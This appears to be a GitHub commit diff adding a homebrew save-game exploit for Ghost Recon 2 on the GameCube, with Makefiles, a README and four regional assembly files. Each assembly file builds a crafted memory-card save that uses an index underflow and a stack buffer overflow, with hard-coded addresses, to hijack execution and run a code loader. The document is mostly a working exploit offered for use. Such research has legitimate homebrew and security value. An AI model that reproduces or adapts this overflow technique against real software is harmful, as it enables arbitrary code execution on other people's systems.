FIX94
diff --git a/‎.gitmodules
Lines changed: 3 additions & 0 deletions b/‎.gitmodules
Lines changed: 3 additions & 0 deletions
diff --git a/‎Makefile
Lines changed: 18 additions & 0 deletions b/‎Makefile
Lines changed: 18 additions & 0 deletions
diff --git a/‎README.md
Lines changed: 2 additions & 1 deletion b/‎README.md
Lines changed: 2 additions & 1 deletion
diff --git a/‎exploit/Makefile
Lines changed: 72 additions & 0 deletions b/‎exploit/Makefile
Lines changed: 72 additions & 0 deletions
diff --git a/‎exploit/ggye.hdr
22.1 KB b/‎exploit/ggye.hdr
22.1 KB
diff --git a/‎exploit/ggye_eng.S
Lines changed: 51 additions & 0 deletions b/‎exploit/ggye_eng.S
Lines changed: 51 additions & 0 deletions
diff --git a/‎exploit/ggye_fre_spa.S
Lines changed: 51 additions & 0 deletions b/‎exploit/ggye_fre_spa.S
Lines changed: 51 additions & 0 deletions
diff --git a/‎exploit/ggyp.hdr
22.1 KB b/‎exploit/ggyp.hdr
22.1 KB
diff --git a/‎exploit/ggyp_eng.S
Lines changed: 51 additions & 0 deletions b/‎exploit/ggyp_eng.S
Lines changed: 51 additions & 0 deletions
diff --git a/‎exploit/ggyp_fre_ger_ita_spa.S
Lines changed: 51 additions & 0 deletions b/‎exploit/ggyp_fre_ger_ita_spa.S
Lines changed: 51 additions & 0 deletions
@@ -0,0 +1,3 @@
+[submodule "loader"]
+	path = loader
+	url = https://github.com/FIX94/gc-exploit-common-loader.git
@@ -0,0 +1,18 @@
+# Copyright 2016 FIX94
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+all:
+	@$(MAKE) --no-print-directory -C loader
+	@mv -f loader/loader.h exploit/loader.h
+	@$(MAKE) --no-print-directory -C searcher
+	@mv -f searcher/searcher.bin exploit/searcher.bin
+	@$(MAKE) --no-print-directory -C exploit
+	@mkdir -p gci
+	@mv -f exploit/*.gci gci
+
+clean:
+	@$(MAKE) --no-print-directory -C loader clean
+	@$(MAKE) --no-print-directory -C searcher clean
+	@$(MAKE) --no-print-directory -C exploit clean
+	rm -rf gci
@@ -1,2 +1,3 @@
 # ghostrecon2-exploit-gc
-a exploit for ghost recon 2 on gamecube
+A exploit for ghost recon 2 on gamecube, you only need a method of injecting the .gci onto your memory card.
+This exploit will load a boot.dol converted with dol2gci (included in Home Bros.) from your memory card.
@@ -0,0 +1,72 @@
+# Copyright 2016 FIX94
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= powerpc-eabi-
+
+# End of configuration.
+
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+	CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+	LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -O1 -fPIC -ffreestanding -mno-eabi -mno-sdata -mcpu=750 -fno-asynchronous-unwind-tables
+
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+	Q :=
+else
+	Q := @
+	MAKEFLAGS += --no-print-directory
+endif
+
+
+targets := ggye_eng.gci ggye_fre_spa.gci ggyp_eng.gci ggyp_fre_ger_ita_spa.gci
+
+objs := ghostrecon2.o start.o
+
+all: $(targets)
+
+$(targets): %.gci: %.elf
+	@echo "  OBJCOPY   $@"
+	$(Q)$(OBJCOPY) -Obinary $< $@
+
+elfs := $(targets:.gci=.elf)
+
+$(elfs): %.elf: ghostrecon2.ld %.o $(objs)
+	@echo "  LINK      $@"
+	$(Q)$(LD) -T $^ -o $@
+
+exploit-objs := $(elfs:.elf=.o)
+
+$(exploit-objs): %.o: %.S
+	@echo "  ASSEMBLE  $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+%.o: %.S
+	@echo "  ASSEMBLE  $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+%.o: %.c
+	@echo "  COMPILE   $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+clean:
+	-rm -f $(targets) $(saves) $(elfs) $(exploit-objs) $(objs) $(slots) $(dats) searcher.bin loader.h
@@ -0,0 +1,51 @@
+// Copyright 2016 FIX94
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+	.section .fstart,"ax"
+	.globl fbegin
+fbegin:
+0:	// gci "header" we use
+	.incbin "ggye.hdr"
+
+	// save start
+	.long 0x55424953
+	.long 0x4F465400
+
+	// player name, will be used for pointer
+	// on mem to our overflow string
+	.long 0x80DE2768 //will be 0x8053C414 on stack
+	.long 0x80DE2768 //will be 0x8053C418 on stack
+	.byte 0
+
+	// save settings
+	.short 0x5249
+	.long 1 ; .long 0
+	.long 1 ; .long 0
+	.long 1 ; .long 0
+	.long 3 ; .long 0
+	.long 0
+
+	// this index underflows a string pointer array at 0x80DE1F70 to point to the
+	// player name on stack (0x8053C414) where we set pointers to our overflow string
+	.long 0xFFF47863
+
+	// more settings
+	.fill 0x35,1,0x00
+
+	// time to set up our overflow string at 0x80DE2768
+	.fill 0x80,1,0x41
+	// r28, point to stack position of our code
+	.long 0x8053C384
+	// r29,r30,r31, stack store position, arent using those
+	.fill 0x10,1,0x41
+	// This function will execute code further down the stack 
+	.long 0x802BFE24
+	// more overflow string filler
+	.fill 0xD,1,0x41
+	// this is actually required for the save to be "valid"
+	.byte 1
+	// last of the overflow string filler
+	.fill 0xE,1,0x41
+	// Our stack code searcher that gets executed from above
+	.incbin "searcher.bin"
@@ -0,0 +1,51 @@
+// Copyright 2016 FIX94
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+	.section .fstart,"ax"
+	.globl fbegin
+fbegin:
+0:	// gci "header" we use
+	.incbin "ggye.hdr"
+
+	// save start
+	.long 0x55424953
+	.long 0x4F465400
+
+	// player name, will be used for pointer
+	// on mem to our overflow string
+	.long 0x80DE8E60 //will be 8053C414 on stack
+	.long 0x80DE8E60 //will be 8053C418 on stack
+	.byte 0
+
+	// save settings
+	.short 0x5249
+	.long 1 ; .long 0
+	.long 1 ; .long 0
+	.long 1 ; .long 0
+	.long 3 ; .long 0
+	.long 0
+
+	// this index underflows a string pointer array at 0x80DE85B0 to point to the
+	// player name on stack (0x8053C418) where we set pointers to our overflow string
+	.long 0xFFF46FDE
+
+	// more settings
+	.fill 0x35,1,0x00
+
+	// time to set up our overflow string at 0x80DE8E60
+	.fill 0x80,1,0x41
+	// r28, point to stack position of our code
+	.long 0x8053C384
+	// r29,r30,r31, stack store position, arent using those
+	.fill 0x10,1,0x41
+	// This function will execute code further down the stack 
+	.long 0x802BFE24
+	// more overflow string filler
+	.fill 0xD,1,0x41
+	// this is actually required for the save to be "valid"
+	.byte 1
+	// last of the overflow string filler
+	.fill 0xE,1,0x41
+	// Our stack code searcher that gets executed from above
+	.incbin "searcher.bin"
@@ -0,0 +1,51 @@
+// Copyright 2016 FIX94
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+	.section .fstart,"ax"
+	.globl fbegin
+fbegin:
+0:	// gci "header" we use
+	.incbin "ggyp.hdr"
+
+	// save start
+	.long 0x55424953
+	.long 0x4F465400
+
+	// player name, will be used for pointer
+	// on mem to our overflow string
+	.long 0x80DD3B34 //will be at 0x8053AC94 on stack
+	.long 0x80DD3B34 //will be at 0x8053AC98 on stack
+	.byte 0
+
+	// save settings
+	.short 0x5249
+	.long 1 ; .long 0
+	.long 1 ; .long 0
+	.long 1 ; .long 0
+	.long 3 ; .long 0
+	.long 0
+
+	// this index underflows a string pointer array at 0x80DD333C to point to the
+	// player name on stack (0x8053AC98) where we set pointers to our overflow string
+	.long 0xFFF48A1D
+
+	// more settings
+	.fill 0x35,1,0x00
+
+	// time to set up our overflow string at 0x80DD3B34
+	.fill 0x80,1,0x41
+	// r28, point to stack position of our code
+	.long 0x8053AC04
+	// r29,r30,r31, stack store position, arent using those
+	.fill 0x10,1,0x41
+	// This function will execute code further down the stack 
+	.long 0x802BFCC8
+	// more overflow string filler
+	.fill 0xD,1,0x41
+	// this is actually required for the save to be "valid"
+	.byte 1
+	// last of the overflow string filler
+	.fill 0xE,1,0x41
+	// Our stack code searcher that gets executed from above at 0x8053AC04
+	.incbin "searcher.bin"
@@ -0,0 +1,51 @@
+// Copyright 2016 FIX94
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+	.section .fstart,"ax"
+	.globl fbegin
+fbegin:
+0:	// gci "header" we use
+	.incbin "ggyp.hdr"
+
+	// save start
+	.long 0x55424953
+	.long 0x4F465400
+
+	// player name, will be used for pointer
+	// on mem to our overflow string
+	.long 0x80DC5068 //will be 8053ac94 on stack
+	.long 0x80DC5068 //will be 8053ac98 on stack
+	.byte 0
+
+	// save settings
+	.short 0x5249
+	.long 1 ; .long 0
+	.long 1 ; .long 0
+	.long 1 ; .long 0
+	.long 3 ; .long 0
+	.long 0
+
+	// this index underflows a string pointer array at 0x80DC4870 to point to the
+	// player name on stack (8053ac98) where we set pointers to our overflow string
+	.long 0xFFF49DAE
+
+	// more settings
+	.fill 0x35,1,0x00
+
+	// time to set up our overflow string for 0x80DC5068
+	.fill 0x80,1,0x41
+	// r28, point to stack position of our code
+	.long 0x8053AC04
+	// r29,r30,r31, stack store position, arent using those
+	.fill 0x10,1,0x41
+	// This function will execute code further down the stack 
+	.long 0x802BFCC8
+	// more overflow string filler
+	.fill 0xD,1,0x41
+	// this is actually required for the save to be "valid"
+	.byte 1
+	// last of the overflow string filler
+	.fill 0xE,1,0x41
+	// Our stack code searcher that gets executed from above at 0x8053AC04
+	.incbin "searcher.bin"
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,3 @@`
	`1`	`+[submodule "loader"]`
	`2`	`+ path = loader`
	`3`	`+ url = https://github.com/FIX94/gc-exploit-common-loader.git`